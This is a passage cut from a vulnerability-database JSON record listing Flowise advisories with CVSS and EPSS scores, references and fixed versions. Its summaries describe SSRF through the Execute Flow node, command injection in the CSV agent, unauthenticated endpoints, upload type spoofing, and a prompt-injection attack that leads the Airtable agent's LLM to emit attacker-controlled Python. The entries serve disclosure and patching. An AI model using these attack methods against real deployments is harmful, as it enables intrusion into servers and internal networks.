"generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849" }, { "reference_url": "https://github.com/advisories/GHSA-q67q-549q-p849", "reference_id": "GHSA-q67q-549q-p849", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-q67q-549q-p849" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "aliases": [ "GHSA-q67q-549q-p849" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g7y6-euhd-jqhh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359950?format=api", "vulnerability_id": "VCID-gvpx-4wkw-43cz", "summary": "Flowise Execute Flow function has an SSRF vulnerability\n### Summary\n\nThe attacker provides an intranet address through the base url field configured in the Execute Flow node \n→ Bypass checkDenyList / resolveAndValidate in httpSecurity.ts (not called)\n→ Causes the server to initiate an HTTP request to any internal network address, read cloud metadata, or detect internal network services \n\n### Details\n\n<img width=\"1280\" height=\"860\" alt=\"9a52a74e6fe2fd78e4962d1d68057fc2\" src=\"https://github.com/user-attachments/assets/20df0006-9129-4886-8928-16d19a617c23\" />\n\nThen initiate the call: \n\n```\nPOST /api/v1/prediction/d6739838-d3b3-43d9-86ff-911a3d757a7e HTTP/1.1\nHost: 127.0.0.1:3000\nContent-Type: application/json\nAuthorization: Bearer apikey\nContent-Length: 17\n\n{\"question\": \"1\"}\n```\n\nServer received a request:\n\n<img width=\"1432\" height=\"172\" alt=\"f45c757fec408e13739db068252ff21b\" src=\"https://github.com/user-attachments/assets/d3dfe0f5-83ec-4c79-ab32-754382a68d5f\" />\n\nAnd there is an echo: \n\n<img width=\"1280\" height=\"666\" alt=\"fa0caf0deb306cfeeea8fdf8941a287e\" src=\"https://github.com/user-attachments/assets/55a94d25-120b-4e9c-9517-46c2fc2b667f\" />\n\nFix:\nCall secureFetch for verification\n\n\n\n### Impact\n\nThis is a Server-Side Request Forgery (SSRF) vulnerability that may lead to the following risks: \n- Explore Internal Web Applications\n- Access sensitive management interfaces\n- Leak internal configuration, credentials, or confidential information\n\nThis vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in enterprise environments.", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9hrv-gvrv-6gf2", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9hrv-gvrv-6gf2" }, { "reference_url": "https://github.com/advisories/GHSA-9hrv-gvrv-6gf2", "reference_id": "GHSA-9hrv-gvrv-6gf2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9hrv-gvrv-6gf2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "GHSA-9hrv-gvrv-6gf2" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gvpx-4wkw-43cz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81063?format=api", "vulnerability_id": "VCID-hkfs-v3bp-kbh5", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41265", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0033", "scoring_system": "epss", "scoring_elements": "0.56326", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41265" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41265", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41265" }, { "reference_url": "https://github.com/advisories/GHSA-v38x-c887-992f", "reference_id": "GHSA-v38x-c887-992f", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v38x-c887-992f" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-v38x-c887-992f", "reference_id": "GHSA-v38x-c887-992f", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:16:20Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-v38x-c887-992f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41265", "GHSA-v38x-c887-992f" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hkfs-v3bp-kbh5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80659?format=api", "vulnerability_id": "VCID-j5hh-haj2-qydg", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41137", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00422", "scoring_system": "epss", "scoring_elements": "0.62518", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41137" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41137", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41137" }, { "reference_url": "https://github.com/advisories/GHSA-9wc7-mj3f-74xv", "reference_id": "GHSA-9wc7-mj3f-74xv", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9wc7-mj3f-74xv" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv", "reference_id": "GHSA-9wc7-mj3f-74xv", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:20:09Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41137", "GHSA-9wc7-mj3f-74xv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j5hh-haj2-qydg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66470?format=api", "vulnerability_id": "VCID-jcze-eg2c-mkcf", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. This issue has been patched in version 3.0.13.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30824", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.21588", "scoring_system": "epss", "scoring_elements": "0.9585", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30824" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30824", "reference_id": "CVE-2026-30824", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30824" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13", "reference_id": "flowise%403.0.13", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:33:44Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13" }, { "reference_url": "https://github.com/advisories/GHSA-5f53-522j-j454", "reference_id": "GHSA-5f53-522j-j454", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5f53-522j-j454" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454", "reference_id": "GHSA-5f53-522j-j454", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:33:44Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api", "purl": "pkg:npm/flowise@3.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13" } ], "aliases": [ "CVE-2026-30824", "GHSA-5f53-522j-j454" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jcze-eg2c-mkcf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212288?format=api", "vulnerability_id": "VCID-jmps-anck-eqdt", "summary": "Flowise is vulnerable to arbitrary file exposure through its ReadFileTool", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61913", "reference_id": "CVE-2025-61913", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61913" }, { "reference_url": "https://github.com/advisories/GHSA-j44m-5v8f-gc9c", "reference_id": "GHSA-j44m-5v8f-gc9c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j44m-5v8f-gc9c" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c", "reference_id": "GHSA-j44m-5v8f-gc9c", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj", "reference_id": "GHSA-jv9m-vf54-chjj", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api", "purl": "pkg:npm/flowise@3.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8" } ], "aliases": [ "GHSA-j44m-5v8f-gc9c" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jmps-anck-eqdt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66502?format=api", "vulnerability_id": "VCID-k579-xd81-hqdu", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the /api/v1/attachments/:chatflowId/:chatId endpoint is listed in WHITELIST_URLS, allowing unauthenticated access to the file upload API. While the server validates uploads based on the MIME types defined in chatbotConfig.fullFileUpload.allowedUploadFileTypes, it implicitly trusts the client-provided Content-Type header (file.mimetype) without verifying the file's actual content (magic bytes) or extension (file.originalname). Consequently, an attacker can bypass this restriction by spoofing the Content-Type as a permitted type (e.g., application/pdf) while uploading malicious scripts or arbitrary files. Once uploaded via addArrayFilesToStorage, these files persist in backend storage (S3, GCS, or local disk). This vulnerability serves as a critical entry point that, when chained with other features like static hosting or file retrieval, can lead to Stored XSS, malicious file hosting, or Remote Code Execution (RCE). This issue has been patched in version 3.0.13.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30821", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00271", "scoring_system": "epss", "scoring_elements": "0.50812", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30821" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30821", "reference_id": "CVE-2026-30821", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30821" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13", "reference_id": "flowise%403.0.13", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:34:55Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13" }, { "reference_url": "https://github.com/advisories/GHSA-j8g8-j7fc-43v6", "reference_id": "GHSA-j8g8-j7fc-43v6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j8g8-j7fc-43v6" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j8g8-j7fc-43v6", "reference_id": "GHSA-j8g8-j7fc-43v6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:34:55Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j8g8-j7fc-43v6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api", "purl": "pkg:npm/flowise@3.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13" } ], "aliases": [ "CVE-2026-30821", "GHSA-j8g8-j7fc-43v6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k579-xd81-hqdu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212768?format=api", "vulnerability_id": "VCID-ksmv-s6c9-t7ap", "summary": "Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint", "references": [ { "reference_url": "https://github.com/advisories/GHSA-jc5m-wrp2-qq38", "reference_id": "GHSA-jc5m-wrp2-qq38", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jc5m-wrp2-qq38" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jc5m-wrp2-qq38", "reference_id": "GHSA-jc5m-wrp2-qq38", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jc5m-wrp2-qq38" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api", "purl": "pkg:npm/flowise@3.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { 